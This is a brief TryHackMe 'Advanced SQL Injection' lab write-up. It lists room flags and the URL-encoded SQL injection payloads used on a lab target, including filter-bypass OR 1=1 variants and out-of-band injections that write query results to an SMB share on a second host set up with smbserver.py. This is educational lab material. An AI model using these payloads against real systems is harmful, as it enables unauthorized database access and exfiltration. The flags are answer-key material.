Monday, another week has begun and it’s time to crack on with some THM!
This week we continue with the Web Application Pentesting path and start off on the Advanced SQL Injection room.
Flag – THM{SO_HACKED}
Flag – THM{Table_Dropped}
http://10.10.18.169/encoding/search_books.php?book_name=Intro%20to%20PHP%27%20%7C%7C%201=1%20–+
Intro%20to%20PHP’%20%7C%7C%201=1%20–+
http://10.10.18.169/space/search_users.php?username=?
http://10.10.18.169/space/search_users.php?username=1%27%0A||%0A1=1%0A–%27+
python3.9 smbserver.py -smb2support -comment “My Logs Server” -debug logs /tmp
http://10.10.18.169/oob/search_visitor.php?visitor_name=Tim
http://10.10.18.169/oob/search_visitor.php?visitor_name=1%27;%20SELECT%20@@version%20INTO%20OUTFILE%20%27\\10.10.12.128\logs\out.txt%27;%20–
http://10.10.18.169/oob/search_visitor.php?visitor_name=1%27;%20SELECT%20@@basedir%20INTO%20OUTFILE%20%27\\10.10.12.128\logs\out1.txt%27;%20–
Flag – THM{HELLO}
Until next time & don’t sleepwalk through life!
Jan mayampitaki